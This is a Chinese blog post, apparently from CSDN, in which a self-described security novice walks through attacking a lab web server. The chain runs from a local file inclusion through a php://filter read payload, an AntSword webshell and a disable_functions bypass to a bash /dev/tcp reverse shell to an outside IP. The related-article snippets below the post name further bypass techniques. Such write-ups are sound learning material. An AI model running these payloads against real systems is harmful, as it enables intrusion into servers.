文件包含漏洞利用到绕过disable_function

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量2.5k 收藏
点赞数 5
文章标签: 安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52400001/article/details/122668690
版权

目标:​​​​​​http://115.126.12.38:90/

当我打开这个网站发现空白界面什么都莫得有(就先随便看看吧),先右击查看一下源代码,我们发现出现#<!---- cat robots-back-hack.bak ----!>#,

试着去访问一下,发现可以下载,成功下载之后发现了两个禁止访问的目录,那么我们试着去使用7kb来进行扫描一下目录

通过扫描发现一个www.tar.gz的压缩包,我拿到linux服务器进行解压,查看,下面就是整个压缩包里面的文件了

下一步我查看backeropena.php文件,只要是稍微懂点代码的人都清楚,这里存在包含漏洞(本本地包含漏洞)

我试着去访问一下这个文件,物理路径爆出来了,那么我们试着使用php协议进行读取他的index.php首页文件看看,

php://filter/read=convert.base64-encode/resource=/www/wwwroot/115.126.12.38/index.php

 已经读取出来了,beas加密,拿出来神器进行解码一下,不解码不知道,解开之后下一跳,这尼玛不就是shell嘛。。。。。,突然佩服命名shell的那位大佬了,(给祖师爷上香!!!)

我就这样稀里糊涂的拿到了shell,使用蚁剑进行连接,执行命令看看是什么权限

执行不了命令,查看一下phpinfo,发现函数都给禁用了。。。。

接下来得绕过disable_function才能进行下一步操作,找了好久,发现蚁剑的插件市场有的大佬写好的绕过工具,我得赶紧去试试哈哈哈嗝。

他成了,他成了,他迈着成功的步伐走来了!!!(总的来说,感谢大佬写的插件)

下一步当然是反弹shell了,

1.nc -vvlp 7777   监听

2.bash -c 'exec bash -i &>/dev/tcp/182.42.122.253/7777 <&1'  反弹

成功反弹shell


但是虽然能执行命令,但并不是root权限,还得想办法提权啊

我尝试了sudo提权,suid提权,命令(find等)提权,全部失败。。。

这篇文章是我第一次发表,也希望大佬嘴下留情,刚入安全圈没多久的小菜鸡,正怀着一颗炽热的心往前奔跑,这篇文章是我自己搭建的靶场,也也是在真实环境中遇到过类似的情况。

                                                                                                

                                                                                          MHcloud一个对安全充满憧憬的小菜鸡

                                                                  

 

 

 

 

 

 

 

 

 

 

 

 

MH cloud
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
从ByteCTF到bypass_disable_function1
08-03
2021/9/12 下午9:37从ByteCTF到bypass_disable_function | Z3ratu1's bloghttps://blog.z3
Web安全文件包含漏洞利用方式
DoubleJing的博客
07-14 186
文件包含漏洞利用方式—伪协议 php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用 data:// 同样类似于 php://input,可以让用户来控制输入流 php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行 phar://xxx.png/shell.php 解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。 文件包含漏洞的利用方式—其他 00截断 长度截断( Windows:256, Linux:4096) 包含日志文件
89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解&实战示例]
qwsn
02-01 3535
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、文件包含漏洞详解 1、文件包含漏洞相关概念 2、PHP文件包含漏洞相关概念 3、PHP文件包含漏洞利用:`构造payload` 4、PHP文件包含漏洞利用:`读取铭感文件` 5、PHP文件包含漏洞利用:`简单的目录遍历绕过+截断绕过` 6、PHP文件包含漏洞利用:`文件上传+文件包含-getshell` 7、PHP文件包含漏洞利用:`Apache日志文件包含getshell` 8、PHP文件包含漏洞利用:`远程文件包
PHP绕过disable_function限制
BerL1n
09-24 4912
前言 之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。 LD_PRELOAD环境变量突破 LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...
无字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 986
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
文件包含到RCE方法
12-10 1065
大家在参加众测的行动时,若是发现了以下基础危害不大的漏洞,不建议直接提交的,而是应该想办法看,能不能对该漏洞进行升级,扩大其危害,多拿点奖励。当然,文件包含不算常见,经常出现在php程序中远程文件包含(RFI)通过上传上传任意格式后缀包含shell代码的文件,然后包含该文件即可。通过apache日志中间件的日志是及其容易受到文件包含攻击的,例如:可以通过在GET URL时,在参数中填写,这样,恶意内容就会被包含到web日志中,在通过包含该日志,即可成功的进行代码执行。常见中间件日志位置。
绕过disable_function总结
unexpectedthing的博客
03-27 4677
前言 有些时候,phpinfo()有disable_functions 蚁剑终端命令不起作用,就可能是df的问题 黑名单绕过 就是一些运维人员php命令执行的函数没禁用完 exec,passthru,shell_exec,eval,system,popen,proc_open(),pcntl_exec 前几种都比较简单 popen 打开进程文件指针 <?php $command=$_POST['cmd']; $handle = popen($command,"r"); while(!feof($
如何在ctf解题实战中绕过disable_function
qq_47168481的博客
01-30 6717
本文介绍将介绍ctf比赛中遇到的三种绕过disable_function的方法
PHP绕过disable_function
shy的博客
12-02 1414
disable_functions 为了服务器的安全,我们可以设置PHP禁止运行一些危险的函数。 设置方法 将需要禁止运行的函数写入到php.ini当中的disable_functions中。 phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,sys
针对宝塔的RASP及其disable_functions的绕过1
08-03
针对宝塔的RASP及其disable_functions的绕过1
绕过disable-functions共享库文件
03-04
LD_PRELOAD绕过disable_functions https://blog.csdn.net/xia739635297/article/details/104641082
BShell:一个webshel​​l帮助脚本小子绕过disable_functions
05-17
一个Webshel​​l帮助脚本小子绕过disable_functions方法未过滤的函数直接执行php5 pcntl_exec exim_exec Windows php5.x COM LD_PRELOAD旁路用法为了使用ld_preload绕过,我们需要复制共享对象文件的内容,可以执行...
登录安全分析报告:小米官网注册
Explinks的博客
05-29 930
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 270
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 667
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
disable_resource_variables
09-17
资源变量是一种特殊类型的变量,用于存储对底层资源的引用,例如文件或网络连接等。当使用自动微分或跟踪计算图时,资源变量的参与会导致不必要的开销,并且可能不适用于某些情况。因此,通过调用disable_resource_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值